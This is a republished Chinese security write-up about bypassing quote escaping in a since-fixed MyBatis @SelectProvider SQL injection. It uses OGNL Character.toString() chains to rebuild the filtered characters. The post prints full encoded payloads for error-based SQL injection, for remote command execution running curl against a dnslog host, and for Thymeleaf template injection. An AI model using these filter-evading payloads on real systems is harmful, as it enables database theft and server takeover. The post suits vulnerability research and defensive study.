记一次“SQL注入” Bypass
2023-6-26 14:46:32 Author: 星冥安全(查看原文) 阅读量:50 收藏

MyBatis 默认是支持OGNL 表达式的,在特定的情况下能从SQL注入转化到RCE的利用。同时在某些情况下还能绕过一些已有的安全机制。

Mybatis是java生态中比较常见的持久层框架。在MyBatis3开始提供了使用Provider注解指定某个工具类的方法来动态编写SQL。常见的注解有:

  • @SelectProvider

  • @InsertProvider

  • @UpdateProvider

  • @DeleteProvider

跟所有ORM框架一样,若使用不当,会存在SQL注入风险。(只要是通过SQL拼接,都会存在风险。)

在实际业务中发现一处Provider注入的case,当前漏洞已经修复完毕 。提取关键的的漏洞代码做下复盘。

查看mapper代码,可以看到name参数直接通过SQL拼接的方式进行查询,如果用户可控的话,会存在SQL注入风险:

@SelectProvider(type = UserProvider.class, method = "getUserByName")
List<User> getUserByName(String name);

class UserProvider {
public String getUserByName(String name) {
String s = new SQL() {
{
SELECT("*");
FROM("users");
WHERE("username like'%"+name+"%'");
}
}.toString();
return s;
}
}

回溯对应的参数传递过程,发现name参数经过了如下函数的处理:

MySQLCodec.v().encode(sql)

跟进具体的代码,核心处理代码如下,该方法是根据ESAPI魔改的方法,会

对参数进行编码转译处理,规避SQL注入的风险:

private String encodeCharacterMySQL( Character c ) {
char ch = c.charValue();
if ( ch == 0x00 ) return "\\0";
if ( ch == 0x08 ) return "\\b";
if ( ch == 0x09 ) return "\\t";
if ( ch == 0x0a ) return "\\n";
if ( ch == 0x0d ) return "\\r";
if ( ch == 0x1a ) return "\\Z";
if ( ch == 0x22 ) return "\\\"";
if ( ch == 0x27 ) return "\\'";
if ( ch == 0x5c ) return "\\\\";
return ""+c;
}

存在注入点的地方为like模糊查询,经过encode()处理后单引号被转义,没办法闭合SQL上下文,无法利用。那么有没有办法可以绕过对应的安全过滤处理成功利用呢?下面是具体的思考过程:

实际上MyBatis 默认是支持OGNL 表达式的,尤其是在动态SQL中,通过OGNL 表达式可以灵活的组装 SQL 语句,从而完成更多的功能。

而Provider注解是可以自定义SQL的过程。可以简单的类比为动态生成了一个xml mapper配置。如果定义的SQL中包含${},拼接成SQL后会调用DynamicSqlSource通过OgnlCache进行相应的解析。也就是说上述场景是支持OGNL表达式解析的 。(具体可见之前的文章,传送门:https://forum.butian.net/share/1749)

但是有个问题是,即使支持OGNL的解析,Java的函数调用传入参数也需要用到单双引号,MySQLCodec. v ().encode()方法同样的做了相应的转义处理。

比起之前只能围绕单双引号困扰,能执行OGNL的话就比较灵活了,可以看看有什么 单双引号的替代方案 。

先看看有什么字符是必要的,{}是必要的,是mybaits进入OGNL解析的入口,其次OGNL表达式的格式如下,那么@也是必要的。

@[类全名(包括包路径)]@[方法名 |  值名]

如果能解决单双引号的转义问题,在SQL注入的基础上,也能进一步调用OGNL对应执行命令的方法,达到RCE的效果。

比较容易想到的思路就是编码,能不能通过编码的方式进行混淆,骗过转义机制。

ognl表达式支持\u这种编码形式。例如如下两个表达式其实都是等价的,返回的结果都是字符串1

\u0040\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0074\u0072\u0069\u006e\u0067\u0040\u0076\u0061\u006c\u0075\u0065\u004f\u0066\u0028\u0031\u0029

@[email protected](1)

可以通过Unicode编码单双引号来绕过对应的转义过程,但是\同样的会经过转义处理,导致对应的表达式无法执行。

if ( ch == 0x5c ) return "\\\\";

除此之外,ASCII转换字符串也是一个不错的思路。
在Java中,char与int两者是支持相加减的。在运算时,int取本身数值,char取对应的ASCII码值。得到的结果是ASCII码增加/减小int对应的数值大小。

如果结果赋值给char类型的变量即是该ASCII码对应的字符,如果赋值给int类型的变量即是该ASCII码的大小。

例如下面的例子,d的ascii码为100:

public static void main(String[] args){
char str = 'd'-3;
System.out.println(str);//100-3=97,赋值给了char类型,所以输出ASCII码97对应的字符a

int i = 'd'-3;
System.out.println(i);//赋值给了int类型,所以输出对应的数字97
}

那么可以考虑首先获取到一个char类型的变量,然后通过加法运算后,再进而转换为对应ASCII码对应的字符。

对应的OGNL表达式,执行后获取的内容为a:

@java.lang.Character@toString(@[email protected](0).charAt(0)+97)

实际上只需要调用Character.toString()即可达到类似的效果了,对应的ognl表达式:

@java.lang.Character@toString(111)

根据上面的思路,可以通过Character.toString()方法得到单个的字符串,那么只需要对这些字符串进行拼接,即可达到想要的内容了,整个过程是不需要使用到单双引号的。接下来验证对应的猜想。

  • SQL注入

根据漏洞代码,输入单引号正常应该是会影响sql上下文导致报错的,但是因为通过MySQLCodec.v().encode()转义,单引号会被认为是普通查询的字符串:

按照前面的思路,这里通过ognl构造一个单引号进行查询,可以看到成功绕过了转义机制,实际sql查询时影响了上下文,导致报错:

同理,这里以报错注入为例,构造sql语句'and updatexml(1,concat(0x7e,user()),1) or '1'='1,经过一系列的转换最终得到poc,可以查看成功通过报错注入得到了数据库用户名:

@java.lang.Character@toString(39)+@java.lang.Character@toString(97)+@java.lang.Character@toString(110)+@java.lang.Character@toString(100)+@java.lang.Character@toString(32)+@java.lang.Character@toString(117)+@java.lang.Character@toString(112)+@java.lang.Character@toString(100)+@java.lang.Character@toString(97)+@java.lang.Character@toString(116)+@java.lang.Character@toString(101)+@java.lang.Character@toString(120)+@java.lang.Character@toString(109)+@java.lang.Character@toString(108)+@java.lang.Character@toString(40)+@java.lang.Character@toString(49)+@java.lang.Character@toString(44)+@java.lang.Character@toString(99)+@java.lang.Character@toString(111)+@java.lang.Character@toString(110)+@java.lang.Character@toString(99)+@java.lang.Character@toString(97)+@java.lang.Character@toString(116)+@java.lang.Character@toString(40)+@java.lang.Character@toString(48)+@java.lang.Character@toString(120)+@java.lang.Character@toString(55)+@java.lang.Character@toString(101)+@java.lang.Character@toString(44)+@java.lang.Character@toString(117)+@java.lang.Character@toString(115)+@java.lang.Character@toString(101)+@java.lang.Character@toString(114)+@java.lang.Character@toString(40)+@java.lang.Character@toString(41)+@java.lang.Character@toString(41)+@java.lang.Character@toString(44)+@java.lang.Character@toString(49)+@java.lang.Character@toString(41)+@java.lang.Character@toString(32)+@java.lang.Character@toString(111)+@java.lang.Character@toString(114)+@java.lang.Character@toString(32)+@java.lang.Character@toString(39)+@java.lang.Character@toString(49)+@java.lang.Character@toString(39)+@java.lang.Character@toString(61)+@java.lang.Character@toString(39)+@java.lang.Character@toString(49)

  • RCE

这里结合dnslog进行验证,尝试执行curl 28knso.dnslog.cn命令,经过上述思路,得到的ongl表达式为:

@java.lang.Runtime@getRuntime().exec(@java.lang.Character@toString(99)+@java.lang.Character@toString(117)+@java.lang.Character@toString(114)+@java.lang.Character@toString(108)+@java.lang.Character@toString(32)+@java.lang.Character@toString(50)+@java.lang.Character@toString(56)+@java.lang.Character@toString(107)+@java.lang.Character@toString(110)+@java.lang.Character@toString(115)+@java.lang.Character@toString(111)+@java.lang.Character@toString(46)+@java.lang.Character@toString(100)+@java.lang.Character@toString(110)+@java.lang.Character@toString(115)+@java.lang.Character@toString(108)+@java.lang.Character@toString(111)+@java.lang.Character@toString(103)+@java.lang.Character@toString(46)+@java.lang.Character@toString(99)+@java.lang.Character@toString(110))

发起reques请求,结合dnslog成功验证:

能直接通过OGNL执行命令当然最好了,如果有相关限制没办法达到目的的话,单纯的利用SQL注入也是一个不错的选择。

除了上述的思路,还可以对poc进行更多的变形,假设+号无法使用的话,实际上可以利用concact方法来完成字符串的拼接,对应的ognl如下,最终得到的是字符串ll:

@java.lang.Character@toString(108).concat(@java.lang.Character@toString(108))

同样的,假设Character不可用,还可以通过字节转换来构造:

new java.lang.String(new byte[]{97})

同样的思路也可以用在Thymeleaf模板注入中,例如执行cat命令:

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).
转载:https://forum.butian.net/share/1844作者:tkswifty欢迎大家去关注作者

欢迎师傅加入安全交流群(qq群:611901335),或者后台回复加群

如果想和我一起讨论,欢迎加入我的知识星球!!!

扫描下图加入freebuf知识大陆

师傅们点赞、转发、在看就是最大的支持

后台回复知识星球或者知识大陆也可获取加入链接(两个加其一即可)


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxMDMwNDE2OQ==&mid=2247491215&idx=1&sn=9b90caba9fcf81054613d8eba2bf0fb7&chksm=c12c2849f65ba15ff5d9dda5327fa0ac28b1132dc267fac6d887ee508113c4731f3d5e3a1f88#rd
如有侵权请联系:admin#unsafe.sh